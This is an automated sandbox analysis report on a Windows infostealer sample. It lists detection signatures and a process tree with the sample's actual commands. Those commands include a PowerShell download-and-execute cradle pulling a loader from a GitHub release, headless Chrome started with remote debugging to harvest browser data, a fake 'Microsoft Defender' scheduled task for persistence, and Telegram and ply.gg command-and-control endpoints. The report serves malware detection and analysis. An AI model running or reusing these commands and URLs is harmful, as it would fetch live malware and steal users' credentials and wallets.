Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SplpM1fFkV.exe

Overview

General Information

Sample name:SplpM1fFkV.exe
renamed because original name is a hash value
Original sample name:770bc9a9a9ff4284b8cb6e333478d25c.exe
Analysis ID:1567443
MD5:770bc9a9a9ff4284b8cb6e333478d25c
SHA1:8f634709fea90f7b10a2612d250936f7459c7327
SHA256:6a915f0e2eaa35eb47d70a933a4d8822d65e64ebea485d9dcb5657f1f4bd1cf8
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
AI detected suspicious sample
Excessive usage of taskkill to terminate processes
Found Tor onion address
Loading BitLocker PowerShell Module
Powershell drops PE file
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • SplpM1fFkV.exe (PID: 5952 cmdline: "C:\Users\user\Desktop\SplpM1fFkV.exe" MD5: 770BC9A9A9FF4284B8CB6E333478D25C)
    • powershell.exe (PID: 6112 cmdline: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ReAgentc.exe (PID: 4592 cmdline: reagentc.exe /disable MD5: A109CC3B919C7D40E4114966340F39E5)
      • taskkill.exe (PID: 4564 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 6004 cmdline: taskkill /F /IM firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 2944 cmdline: taskkill /F /IM brave.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 3556 cmdline: taskkill /F /IM opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5588 cmdline: taskkill /F /IM kometa.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 1276 cmdline: taskkill /F /IM orbitum.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 1412 cmdline: taskkill /F /IM centbrowser.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 7056 cmdline: taskkill /F /IM 7star.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 1272 cmdline: taskkill /F /IM sputnik.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 6620 cmdline: taskkill /F /IM vivaldi.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 2804 cmdline: taskkill /F /IM epicprivacybrowser.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5568 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 1680 cmdline: taskkill /F /IM uran.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 3788 cmdline: taskkill /F /IM yandex.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 4072 cmdline: taskkill /F /IM iridium.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 6788 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • chrome.exe (PID: 5136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • taskkill.exe (PID: 180 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 6188 cmdline: taskkill /F /IM firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 1848 cmdline: taskkill /F /IM brave.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5268 cmdline: taskkill /F /IM opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5804 cmdline: taskkill /F /IM kometa.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 3292 cmdline: taskkill /F /IM orbitum.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 2300 cmdline: taskkill /F /IM centbrowser.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 6772 cmdline: taskkill /F /IM 7star.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 2108 cmdline: taskkill /F /IM sputnik.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5628 cmdline: taskkill /F /IM vivaldi.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 1560 cmdline: taskkill /F /IM epicprivacybrowser.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 2408 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5404 cmdline: taskkill /F /IM uran.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 4180 cmdline: taskkill /F /IM yandex.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 3496 cmdline: taskkill /F /IM iridium.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • schtasks.exe (PID: 616 cmdline: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • powershell.exe (PID: 6136 cmdline: powershell -Command $env:USERNAME MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5808 cmdline: powershell -Command "Compress-Archive -Path \"C:\Users\user\AppData\Local\Temp\user\" -DestinationPath \"C:\Users\user\AppData\Local\Temp\user.zip\" -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 5228 cmdline: wmic os get caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 1876 cmdline: wmic NIC get MACAddress MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • DisplayDriverUpdater.exe (PID: 6768 cmdline: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6112, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", ProcessId: 5136, ProcessName: chrome.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, CommandLine: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6112, ParentProcessName: powershell.exe, ProcessCommandLine: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, ProcessId: 616, ProcessName: schtasks.exe
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", CommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SplpM1fFkV.exe", ParentImage: C:\Users\user\Desktop\SplpM1fFkV.exe, ParentProcessId: 5952, ParentProcessName: SplpM1fFkV.exe, ProcessCommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", ProcessId: 6112, ProcessName: powershell.exe
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "Compress-Archive -Path \"C:\Users\user\AppData\Local\Temp\user\" -DestinationPath \"C:\Users\user\AppData\Local\Temp\user.zip\" -Force", CommandLine: powershell -Command "Compress-Archive -Path \"C:\Users\user\AppData\Local\Temp\user\" -DestinationPath \"C:\Users\user\AppData\Local\Temp\user.zip\" -Force", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SplpM1fFkV.exe", ParentImage: C:\Users\user\Desktop\SplpM1fFkV.exe, ParentProcessId: 5952, ParentProcessName: SplpM1fFkV.exe, ProcessCommandLine: powershell -Command "Compress-Archive -Path \"C:\Users\user\AppData\Local\Temp\user\" -DestinationPath \"C:\Users\user\AppData\Local\Temp\user.zip\" -Force", ProcessId: 5808, ProcessName: powershell.exe
Sigma detected: Browser Execution In Headless Mode
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6112, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", ProcessId: 5136, ProcessName: chrome.exe
Sigma detected: Browser Started with Remote Debugging
Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6112, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", ProcessId: 5136, ProcessName: chrome.exe
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command "Compress-Archive -Path \"C:\Users\user\AppData\Local\Temp\user\" -DestinationPath \"C:\Users\user\AppData\Local\Temp\user.zip\" -Force", CommandLine: powershell -Command "Compress-Archive -Path \"C:\Users\user\AppData\Local\Temp\user\" -DestinationPath \"C:\Users\user\AppData\Local\Temp\user.zip\" -Force", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SplpM1fFkV.exe", ParentImage: C:\Users\user\Desktop\SplpM1fFkV.exe, ParentProcessId: 5952, ParentProcessName: SplpM1fFkV.exe, ProcessCommandLine: powershell -Command "Compress-Archive -Path \"C:\Users\user\AppData\Local\Temp\user\" -DestinationPath \"C:\Users\user\AppData\Local\Temp\user.zip\" -Force", ProcessId: 5808, ProcessName: powershell.exe
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe, ProcessId: 6768, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihdav2d1.b53.ps1
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6112, TargetFilename: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", CommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SplpM1fFkV.exe", ParentImage: C:\Users\user\Desktop\SplpM1fFkV.exe, ParentProcessId: 5952, ParentProcessName: SplpM1fFkV.exe, ProcessCommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", ProcessId: 6112, ProcessName: powershell.exe
Sigma detected: Suspicious Schtasks From Env Var Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, CommandLine: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6112, ParentProcessName: powershell.exe, ProcessCommandLine: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, ProcessId: 616, ProcessName: schtasks.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", CommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SplpM1fFkV.exe", ParentImage: C:\Users\user\Desktop\SplpM1fFkV.exe, ParentProcessId: 5952, ParentProcessName: SplpM1fFkV.exe, ProcessCommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", ProcessId: 6112, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", CommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SplpM1fFkV.exe", ParentImage: C:\Users\user\Desktop\SplpM1fFkV.exe, ParentProcessId: 5952, ParentProcessName: SplpM1fFkV.exe, ProcessCommandLine: powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex", ProcessId: 6112, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1200, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-03T15:26:59.938026+010028032742Potentially Bad Traffic192.168.2.54970620.233.83.145443TCP
2024-12-03T15:27:01.675484+010028032742Potentially Bad Traffic192.168.2.549707185.199.109.133443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://saw-worse.gl.at.ply.gg:14254/builder/logAgentAvira URL Cloud: Label: malware
Source: https://saw-worse.gl.at.ply.gg:14254/builder/logAgentPostAvira URL Cloud: Label: malware
Source: https://saw-worse.gl.at.ply.gg:14254/builder/logAgenthttp:Avira URL Cloud: Label: malware
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: SplpM1fFkV.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: powershell.pdbUGP source: DisplayDriverUpdater.exe, 0000002A.00000000.2412166037.00007FF625FFA000.00000002.00000001.01000000.0000000C.sdmp, DisplayDriverUpdater.exe.1.dr
Source: Binary string: powershell.pdb source: DisplayDriverUpdater.exe, 0000002A.00000000.2412166037.00007FF625FFA000.00000002.00000001.01000000.0000000C.sdmp, DisplayDriverUpdater.exe.1.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 1001

Networking

barindex
Found Tor onion address
Source: SplpM1fFkV.exe, 00000000.00000000.2021473176.00000000009E8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: m=nil base SundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondAcceptServernetdnsdomaingophertelnet.local.onionip+netreturnGetACPrdtscppopcntsecretcmd/goheaderAnswerLengthSTREETavx512rdrandrdseedchat_id%s%s/%scaption(PANIC=float32float64UpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT (trap consolePATHEXTtls3desderivedInitialabortedCopySidWSARecvWSASendconnectsignal 19531259765625invaliduintptrChanDir Value>i < lenConvertforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
Source: SplpM1fFkV.exeString found in binary or memory: m=nil base SundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondAcceptServernetdnsdomaingophertelnet.local.onionip+netreturnGetACPrdtscppopcntsecretcmd/goheaderAnswerLengthSTREETavx512rdrandrdseedchat_id%s%s/%scaption(PANIC=float32float64UpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT (trap consolePATHEXTtls3desderivedInitialabortedCopySidWSARecvWSASendconnectsignal 19531259765625invaliduintptrChanDir Value>i < lenConvertforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: global trafficTCP traffic: 192.168.2.5:49778 -> 147.185.221.24:14254
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 185.199.109.133:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 20.233.83.145:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/884985882/df985353-b412-45be-a5df-5d50a4ddaf53?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241203T142654Z&X-Amz-Expires=300&X-Amz-Signature=489e3c2eced019fad27973c10618a9efce0574e42ef117f630590362dbc09acf&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dsryxen_loader.ps1&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.com
